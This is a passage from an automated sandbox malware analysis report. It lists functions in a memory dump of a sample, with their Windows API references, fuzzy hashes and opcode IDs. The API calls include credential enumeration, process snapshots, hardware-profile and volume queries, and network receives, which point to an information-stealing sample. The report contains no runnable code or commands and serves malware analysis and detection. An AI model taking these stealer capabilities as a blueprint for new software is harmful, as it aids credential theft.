Instruction Fuzzy Hash: D7111C32258B8086EB509F15F8403DAB2A0F7C9B80F54D125EF9957B68CF3CCA09CB90

Function 00007FF6A7044050 Relevance: 3.9, APIs: 3, Instructions: 195memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FF6A70441B7

Part of subcall function 00007FF6A7044F00: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6A7043C4C,?,?,?,00007FF6A7041097), ref: 00007FF6A7044F50

VirtualFree.KERNEL32(?), ref: 00007FF6A70442B5
VirtualAlloc.KERNEL32 ref: 00007FF6A70442F6

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Virtual$Alloc$FreeQuery
String ID:
API String ID: 609462816-0
Opcode ID: ea88e6755f1c952dde9103f57d4804c3fc97b2dab698ddd173a76000a050952f
Instruction ID: a3111617929ea0fbd16fb61178c1e6d59c31daa2a98426085f85548ffb4345d1
Opcode Fuzzy Hash: ea88e6755f1c952dde9103f57d4804c3fc97b2dab698ddd173a76000a050952f
Instruction Fuzzy Hash: 8171A6A1B0EB4245FE645F11A65027AA391BFA5BC4F544031EE4ED7BD6DF3CE426A300

Function 0000018C89A4F350 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A4F53C

Strings

, xrefs: 0000018C89A4F3D3

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-3916222277
Opcode ID: 20c2071698a00b5fd38fc51411455128543d2eab0459b8c43055e1e5f3513098
Instruction ID: d8ec7f0faf994301707ece6806498ca3e33566502dd7c5c5541725f18b520613
Opcode Fuzzy Hash: 20c2071698a00b5fd38fc51411455128543d2eab0459b8c43055e1e5f3513098
Instruction Fuzzy Hash: 9B517872240B4496EB158F2AD1543DD33A0F34AB94F95D622CF5E43BA0CF78D1A9C390

Function 0000018C89A90C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32 ref: 0000018C89A90C6C

Strings

Unknown, xrefs: 0000018C89A90D26

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: 327d7d51cf89ce8cae5e34d504ec04f85fc3bceab43135c4ad84e114b6f625fa
Instruction ID: 474aca25cb1b47c4228d54ed36fa397e9d5cbf9713edc88c34dfb182b860652e
Opcode Fuzzy Hash: 327d7d51cf89ce8cae5e34d504ec04f85fc3bceab43135c4ad84e114b6f625fa
Instruction Fuzzy Hash: B031A133628BC086E710CB20E5503EAA360F79A784F549215EBC912A46DF7CD699CB40

Function 0000018C89A551E0 Relevance: 3.2, APIs: 2, Instructions: 192COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A55320
Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A5541F

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: d950ca193e7e9d4ee6d3d8a66134eba55489720bfff0fef36ccb5ca78ca456df
Instruction ID: 439fba0afcc09241d68a72a7491bfa87bdad69eaac0a022062ed285574108537
Opcode Fuzzy Hash: d950ca193e7e9d4ee6d3d8a66134eba55489720bfff0fef36ccb5ca78ca456df
Instruction Fuzzy Hash: FB512772385B4085FE249B92A5003ED6361E70ABE4F58D6219E6D0B7C6DE79C689C3A0

Function 00007FF6A7042960 Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A7042ADC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7042AE2

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: 17d78b6c5c56375eb874d41d2a80c4d6dc6448b3f7763c03c887009f28ab597e
Instruction ID: 36c5817f8f200c519476266f7b616b7debbc987ec2faadc8337ac74926016051
Opcode Fuzzy Hash: 17d78b6c5c56375eb874d41d2a80c4d6dc6448b3f7763c03c887009f28ab597e
Instruction Fuzzy Hash: CE4127A6B0AB4289EE24DF12A4003BA6351BB14FE4F544631DF5DCB7C5DE7CE1619304

Function 0000018C89A88E10 Relevance: 3.1, APIs: 2, Instructions: 87COMMON

Download Yara Rule

APIs

SHGetKnownFolderPath.SHELL32 ref: 0000018C89A88E69
CoTaskMemFree.OLE32 ref: 0000018C89A88F2A

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: FolderFreeKnownPathTask
String ID:
API String ID: 969438705-0
Opcode ID: 2e1fffe90520dd557920388e28507833548f1b316689cdecaf84a1eb2a2be702
Instruction ID: 07b7ba2ef117be2dbeecbdf69444ed5070f8586ed8d8a4c3c4197f0f8150596c
Opcode Fuzzy Hash: 2e1fffe90520dd557920388e28507833548f1b316689cdecaf84a1eb2a2be702
Instruction Fuzzy Hash: CD317372954B8081EB20CB69E4403DEB761F79A7E4F149316FAAC03A95DF7CC6858B40

Function 0000018C89A9E614 Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89A9E63B

Part of subcall function 0000018C89A9E5D0: _invalid_parameter_noinfo.LIBCMT ref: 0000018C89A9E5E7

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89A9E6EF

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: cb30a7c2c620b97f400ef9b33bc0fdb0214d80daa24a11497eeb67f4fc095207
Instruction ID: 65668253ee8189589169a0558fa5dcf0a3c8566234eb89bfc9f19a28fe79cb09
Opcode Fuzzy Hash: cb30a7c2c620b97f400ef9b33bc0fdb0214d80daa24a11497eeb67f4fc095207
Instruction Fuzzy Hash: 4431F532290A4486EA50DF54E8503F973A0F7D6B80FA5C521E62A473D3EE78D728C3A0

Function 0000018C89A87390 Relevance: 3.1, APIs: 2, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 0000018C89A873E1
RegCloseKey.ADVAPI32 ref: 0000018C89A873F3

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: 33579b64be932ee1adaf6035fef093b9a7736483f65c6bed23fb5657630c88d8
Instruction ID: 8abdfb00aa430fd533f4e8528d7dd4f665eee7fe52b259cc8a7ced662766e900
Opcode Fuzzy Hash: 33579b64be932ee1adaf6035fef093b9a7736483f65c6bed23fb5657630c88d8
Instruction Fuzzy Hash: 02210731750A9449FE509B21F8403EAA760EB96BD4F48C121FE4D53BA6DF38C68AC790

Function 0000018C89A8664C Relevance: 3.1, APIs: 2, Instructions: 58synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0000018C89A4C8C0: CreateToolhelp32Snapshot.KERNEL32 ref: 0000018C89A4C90A
Part of subcall function 0000018C89A4C8C0: Process32FirstW.KERNEL32 ref: 0000018C89A4C94C

Part of subcall function 0000018C89A4ACC0: CredEnumerateA.ADVAPI32 ref: 0000018C89A4AD22

Part of subcall function 0000018C89A8E9F0: recv.WS2_32 ref: 0000018C89A8EBCC

ReleaseMutex.KERNEL32 ref: 0000018C89A866BB
CloseHandle.KERNEL32 ref: 0000018C89A866C4

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: CloseCreateCredEnumerateFirstHandleMutexProcess32ReleaseSnapshotToolhelp32recv
String ID:
API String ID: 420082584-0
Opcode ID: 6cbb35264d3af9d3b1548d5a1ccd0fc23f5837e511aba725e3f5ecd0c3bcc6bd
Instruction ID: 0bc68f9428f3773c2daa8a12089e2fcaa170198908ba363af80c1f70b485f6a1
Opcode Fuzzy Hash: 6cbb35264d3af9d3b1548d5a1ccd0fc23f5837e511aba725e3f5ecd0c3bcc6bd
Instruction Fuzzy Hash: 432127716C46D081FE60B7B8A4573EE2254AF87790F14DA10FAA9115C39F38838E83F2

Function 0000018C89A8667D Relevance: 3.0, APIs: 2, Instructions: 47synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0000018C89A8E9F0: recv.WS2_32 ref: 0000018C89A8EBCC

ReleaseMutex.KERNEL32 ref: 0000018C89A866BB
CloseHandle.KERNEL32 ref: 0000018C89A866C4

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: CloseHandleMutexReleaserecv
String ID:
API String ID: 2659716615-0
Opcode ID: eca0cdce0ddfb544edceff3c729bb4a71f08e5ff18005c1b5199ae0a99c22d4d
Instruction ID: b7c096098882254580e5351acb0b16589d79ea4d641403aa23192a8116c2a848
Opcode Fuzzy Hash: eca0cdce0ddfb544edceff3c729bb4a71f08e5ff18005c1b5199ae0a99c22d4d
Instruction Fuzzy Hash: D911CE716C02D041FE60B778E45A3EE6250AB87790F54DA21FAA9116D39E38828E83F1

Function 0000018C89AADB60 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 0000018C89AADBAC
GetLastError.KERNEL32 ref: 0000018C89AADBB6

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7e9ab1c6d8c64915d6648e9c143c2363700413bfa3c055332623f50353a46816
Instruction ID: 1a1b6dfd93ca652b39745f15a9fcebe574c2d1824837afe6747bea7c83b92508
Opcode Fuzzy Hash: 7e9ab1c6d8c64915d6648e9c143c2363700413bfa3c055332623f50353a46816
Instruction Fuzzy Hash: 57119475214B8082DA208B25E4482DDA3A1E746BF4F54C321EEB94BBD9CF78C2588790

Function 00007FF6A706CE54 Relevance: 3.0, APIs: 2, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A706CE84

Part of subcall function 00007FF6A706DAE0: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6A706DAE9

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A706CE8A

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: a18cefe2d12551028f3056aac5d6e62e4fbca414a85a138043c9f28a0b70d310
Instruction ID: ec5f554b34a1eae9aeeb76b0c79b223fe6fa18be6d90496b368488246199436c
Opcode Fuzzy Hash: a18cefe2d12551028f3056aac5d6e62e4fbca414a85a138043c9f28a0b70d310
Instruction Fuzzy Hash: 25E046C6E5F10705FD282BA214320BA60540F29BB4E191730DA3ECA2C3ED8CB2F1A190

Function 0000018C89ABCB98 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89ABCBC8

Part of subcall function 0000018C89ABDBEC: std::bad_alloc::bad_alloc.LIBCMT ref: 0000018C89ABDBF5

Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89ABCBCE

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: 267b89f17236609d1417f10d46edbd95984192d968a560c5371d581f7ac22313
Instruction ID: 31a97299ab996b48771319936e3572bae91b738822021062c714f8a574d6d9a1
Opcode Fuzzy Hash: 267b89f17236609d1417f10d46edbd95984192d968a560c5371d581f7ac22313
Instruction Fuzzy Hash: 74E0C2312D210566FC1C32790C297F910508B0B330F1CCF216971092C3AD30C29D83F0

Function 00007FF6A7060554 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,00000000,00007FF6A7060C21,?,?,0000F362032EB126,00007FF6A706066D,?,?,?,?,00007FF6A706C66A,?,?,00000000), ref: 00007FF6A706056A
GetLastError.KERNEL32(?,?,00000000,00007FF6A7060C21,?,?,0000F362032EB126,00007FF6A706066D,?,?,?,?,00007FF6A706C66A,?,?,00000000), ref: 00007FF6A7060574

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 43a509883ac49e6a5de9370612de203f62b5326ede6e7c11b2a257d050534144
Instruction ID: 11682e5e56770f54eaa5e7db7c8a65b6f1f78a6cb3b9b7b50a310799d8ba8464
Opcode Fuzzy Hash: 43a509883ac49e6a5de9370612de203f62b5326ede6e7c11b2a257d050534144
Instruction Fuzzy Hash: 49E08CD0F4B60282FF086FF2986587622A05F98B01F048534CC0DC3395EE7CAAE58310

Function 0000018C89AAB550 Relevance: 2.5, APIs: 2, Instructions: 18memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 0000018C89AAB566
GetLastError.KERNEL32 ref: 0000018C89AAB570

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 47cbcda289b4926f8a5fa232dbc04e0ffd722977d505590b0caac84d58b1b127
Instruction ID: 383ff2fa8326f08696db7c89f02ca6034398f64f7bdd4635219ae325c36502ad
Opcode Fuzzy Hash: 47cbcda289b4926f8a5fa232dbc04e0ffd722977d505590b0caac84d58b1b127
Instruction Fuzzy Hash: 6AE0EC70B9160583FE1867F258592FD52D55F96740F04C4349A1686291ED38474C53A0

Function 0000018C89A9D450 Relevance: 1.7, APIs: 1, Instructions: 189COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A9D6A0

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 9fcb33472065abb6a3ba9b28e3a1c84ec1e6a49a5140596591e166cbfaef9e72
Instruction ID: c9a4a6b74972d5e781b72a2733eeec11b4e671cf3abd6c1b7425aaf682ef71c7
Opcode Fuzzy Hash: 9fcb33472065abb6a3ba9b28e3a1c84ec1e6a49a5140596591e166cbfaef9e72
Instruction Fuzzy Hash: D061AB72340A8084EB149F1AD1543ED27A1F346FD8F54C511EE6D0BBD6DE39EA8AD3A0

Function 0000018C89A3E150 Relevance: 1.7, APIs: 1, Instructions: 175COMMON

Download Yara Rule

APIs

__std_fs_directory_iterator_open.LIBCPMT ref: 0000018C89A3E283

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: __std_fs_directory_iterator_open
String ID:
API String ID: 4007087469-0
Opcode ID: f97e729366d47bfa4c7aafed75f1aa1c45cd1a185c9e6d560cf73fb06629d366
Instruction ID: 8ebfa9ae5e239843fce0a86841bf1ad501a5f2c9a8f2bc91eb3fc59eee17b105
Opcode Fuzzy Hash: f97e729366d47bfa4c7aafed75f1aa1c45cd1a185c9e6d560cf73fb06629d366
Instruction Fuzzy Hash: 7861E372B80B4086FF10DBA9D4803FD23A1E746798F11C611EE2957AD5EE34CA9993A0

Function 0000018C89A55B00 Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A55C95

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: f9396f0a9253e952e53e4fe994d66b24a34a41efdbf6e0f6bb2cf89b2861a192
Instruction ID: 509584885534ba2ab456acaa15df5580d6be92a728ec53afc522f471e2407441
Opcode Fuzzy Hash: f9396f0a9253e952e53e4fe994d66b24a34a41efdbf6e0f6bb2cf89b2861a192
Instruction Fuzzy Hash: 1F41EF72344B8491EE109F56E4483DD6361F74ABD4F58C621DFAD0B786EE3AC24983A0

Function 0000018C89A7B010 Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A7B1B7

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: fba439574e17a6ddaded4d78526afe7e8730f04a024229f352505fe1e513646b
Instruction ID: 83805ffab1d365463193768ed6468d64bb4c21f7517c3d55001b1573142d005c
Opcode Fuzzy Hash: fba439574e17a6ddaded4d78526afe7e8730f04a024229f352505fe1e513646b
Instruction Fuzzy Hash: 7041B2B6250B8491DA24CB66E5542EEB3A1F78ABD4F50C616EBED03B85DF38C249C350

Function 0000018C89A55CB0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A55E2C

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 151963a1d35d9b2458fa7356010a02c0380cc5ef0c6ddef4ab90596499244b32
Instruction ID: bb1da43b25bf8b307e7b87bcf3b712753081f6690a44f8438bf6f2991ec43fb5
Opcode Fuzzy Hash: 151963a1d35d9b2458fa7356010a02c0380cc5ef0c6ddef4ab90596499244b32
Instruction Fuzzy Hash: E941F373350B4485EE20EB56E9083DDA351F30AFD8F58C6219E6D0B7D6DE79C24993A0

Function 0000018C89A59ED0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A5A034

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 0bdfcff8c71f8c56022a3f8f635dfa8f1d8feae1f3ce92fd781256aa006a54ff
Instruction ID: 2321b3dafb9cc35d7e70a92cb89b3090fadd521238db58a46fe4a66f5b84476d
Opcode Fuzzy Hash: 0bdfcff8c71f8c56022a3f8f635dfa8f1d8feae1f3ce92fd781256aa006a54ff
Instruction Fuzzy Hash: 40312172351B8482ED10DB96A4046EE6354F346BE4F90CA25AF7D0BBD5CE3DC24AC3A0

Function 0000018C89A515C0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A51711

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: a5ae6231cbb24254c8b068cf12357dadab82e056a22c354a1433d8de02300c2b
Instruction ID: c2f5f2db89a82dbf0ae4ef8e4d96013f3e32c5c675640365a701000dc3d657c1
Opcode Fuzzy Hash: a5ae6231cbb24254c8b068cf12357dadab82e056a22c354a1433d8de02300c2b
Instruction Fuzzy Hash: 4B31467238178484FE15AB95E5443FD12919707FE8F58C621DE2D07BD6EE78C689C3A0

Function 0000018C89AABA50 Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AABA78

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f1929d788aef536cbe8cf6883a7401ff42454cfe712c6df48b8c1514241a1e94
Instruction ID: 99471ce4d62d37718560e5c314c1120a1281a96356fbb0b3907a9c8319595bbc
Opcode Fuzzy Hash: f1929d788aef536cbe8cf6883a7401ff42454cfe712c6df48b8c1514241a1e94
Instruction Fuzzy Hash: 0141D33269420487EA348B19E5503E9F7E0E797B80F14C121EA96836E4CF38DA4AC7E1

Function 0000018C89A90250 Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNEL32 ref: 0000018C89A902E0

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: bab2c3626ac6b4d65a00a26ee52bdc39fa55a87b0d5a689555181bbd374438f5
Instruction ID: d8ee3a4f9471c9310519fc9fb7172d1e975219efe563e71d0c8078a8ac6fabb1
Opcode Fuzzy Hash: bab2c3626ac6b4d65a00a26ee52bdc39fa55a87b0d5a689555181bbd374438f5
Instruction Fuzzy Hash: 8C519332A54B908AE710CF68D8403DD7370F796788F508211EB9D53A99DF78D685C790

Function 0000018C89A4FE50 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A4FF58

Part of subcall function 0000018C89A3B7B0: __std_exception_copy.LIBVCRUNTIME ref: 0000018C89A3B7F8

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task__std_exception_copy
String ID:
API String ID: 317858897-0
Opcode ID: 86bc9bfdf9d26e5dd65f1e4cdc1cadeb0a40fe1178c613ee79c5f5c24ce296f0
Instruction ID: e05ed7ca0c284d95dea0be65d76225e70c57ee7a562348d242d97c964bf88054
Opcode Fuzzy Hash: 86bc9bfdf9d26e5dd65f1e4cdc1cadeb0a40fe1178c613ee79c5f5c24ce296f0
Instruction Fuzzy Hash: F6210933701B4082EE18EB15A1013ED6390E74AFA8F24D7219A7C07BD2EE79C6D68390

Function 0000018C89AAD4D0 Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AAD556

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

